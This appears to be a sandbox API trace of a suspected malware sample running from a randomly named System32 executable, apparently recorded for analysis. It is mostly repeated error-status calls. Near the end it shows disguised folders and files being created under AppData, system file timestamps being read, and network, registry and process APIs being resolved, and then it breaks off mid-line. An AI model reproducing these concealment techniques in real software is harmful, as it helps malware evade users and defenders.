SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.182] SetLastError (dwErrCode=0x0) [0036.182] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.183] SetLastError (dwErrCode=0x0) [0036.183] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.184] SetLastError (dwErrCode=0x0) [0036.184] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.185] GetLastError () returned 0x0 [0036.185] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.186] GetLastError () returned 0x0 [0036.186] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.187] GetLastError () returned 0x0 [0036.187] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.188] GetLastError () returned 0x0 [0036.188] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.189] GetLastError () returned 0x0 [0036.189] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.190] SetLastError (dwErrCode=0x0) [0036.190] GetLastError () returned 0x0 [0036.191] SetLastError (dwErrCode=0x0) [0036.191] GetLastError () returned 0x0 [0036.191] SetLastError (dwErrCode=0x0) [0036.191] GetLastError () returned 0x0 [0036.191] SetLastError (dwErrCode=0x0) [0036.191] GetLastError () returned 0x0 [0036.191] SetLastError (dwErrCode=0x0) [0036.191] GetLastError () returned 0x0 [0036.191] SetLastError (dwErrCode=0x0) [0036.204] GetLastError () returned 0x0 [0036.204] SetLastError (dwErrCode=0x0) [0036.204] GetLastError () returned 0x0 [0036.204] SetLastError (dwErrCode=0x0) [0036.204] GetLastError () returned 0x0 [0036.204] SetLastError (dwErrCode=0x0) [0036.204] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.205] SetLastError (dwErrCode=0x0) [0036.205] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.206] SetLastError (dwErrCode=0x0) [0036.206] GetLastError () returned 0x0 [0036.207] SetLastError (dwErrCode=0x0) [0036.207] GetLastError () returned 0x0 [0036.207] SetLastError (dwErrCode=0x0) [0036.207] GetLastError () returned 0x0 [0036.207] SetLastError (dwErrCode=0x0) [0036.207] GetLastError () returned 0x0 [0036.207] SetLastError (dwErrCode=0x0) [0036.207] GetLastError () returned 0x0 [0036.207] SetLastError (dwErrCode=0x0) [0036.207] GetLastError () returned 0x0 [0036.207] SetLastError (dwErrCode=0x0) [0036.207] GetLastError () returned 0x0 [0036.207] SetLastError (dwErrCode=0x0) [0036.207] GetLastError () returned 0x0 [0036.207] SetLastError (dwErrCode=0x0) [0036.207] GetLastError () returned 0x0 [0036.207] SetLastError (dwErrCode=0x0) [0036.207] GetLastError () returned 0x0 [0036.207] SetLastError (dwErrCode=0x0) [0036.207] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.208] GetLastError () returned 0x0 [0036.208] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.209] SetLastError (dwErrCode=0x0) [0036.209] GetLastError () returned 0x0 [0036.210] SetLastError (dwErrCode=0x0) [0036.210] GetLastError () returned 0x0 [0036.210] SetLastError (dwErrCode=0x0) [0036.210] GetLastError () returned 0x0 [0036.210] SetLastError (dwErrCode=0x0) [0036.210] GetLastError () returned 0x0 [0036.210] SetLastError (dwErrCode=0x0) [0036.210] GetLastError () returned 0x0 [0036.210] SetLastError (dwErrCode=0x0) [0036.210] GetLastError () returned 0x0 [0036.210] SetLastError (dwErrCode=0x0) [0036.211] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0036.211] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0036.211] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0036.212] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f588 | out: lpSystemTimeAsFileTime=0x26f588*(dwLowDateTime=0xe3455fd0, dwHighDateTime=0x1d3dfba)) [0036.212] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f4c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.212] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f3a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.212] GetLastError () returned 0x0 [0036.212] GetLastError () returned 0x0 [0036.212] GetLastError () returned 0x0 [0036.212] GetLastError () returned 0x0 [0036.212] GetLastError () returned 0x0 [0036.212] GetLastError () returned 0x0 [0036.212] GetLastError () returned 0x0 [0036.212] GetLastError () returned 0x0 [0036.212] GetLastError () returned 0x0 [0036.212] GetLastError () returned 0x0 [0036.213] GetLastError () returned 0x0 [0036.213] GetLastError () returned 0x0 [0036.213] GetLastError () returned 0x0 [0036.213] GetLastError () returned 0x0 [0036.213] GetLastError () returned 0x0 [0036.213] GetLastError () returned 0x0 [0036.213] GetLastError () returned 0x0 [0036.213] GetLastError () returned 0x0 [0036.213] GetLastError () returned 0x0 [0036.213] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.213] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0036.213] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.213] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.213] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.213] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.213] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0036.213] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0036.213] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0036.213] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0036.214] GetLastError () returned 0xb7 [0036.214] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.214] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0036.214] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0036.214] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0036.214] wsprintfA (in: param_1=0x26f228, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.214] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0036.214] wsprintfA (in: param_1=0x26f124, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.214] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.214] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0036.214] CloseHandle (hObject=0x74) returned 1 [0036.214] GetLastError () returned 0x0 [0036.214] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0036.214] GetLastError () returned 0x0 [0036.214] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0036.215] GetSystemDirectoryA (in: lpBuffer=0x26f228, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.215] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.215] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0036.215] CloseHandle (hObject=0x74) returned 1 [0036.215] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.215] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.215] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0036.217] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0036.217] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0036.217] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0036.217] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0036.217] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0036.217] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0036.217] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0036.217] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0036.218] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0036.219] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.220] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0036.220] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0036.220] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0036.220] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0036.220] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0036.220] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0036.220] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0036.220] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0036.220] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0036.220] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0036.220] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0036.220] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0036.220] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0036.220] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0036.221] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0036.221] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0036.221] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0036.221] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0036.221] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0036.221] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 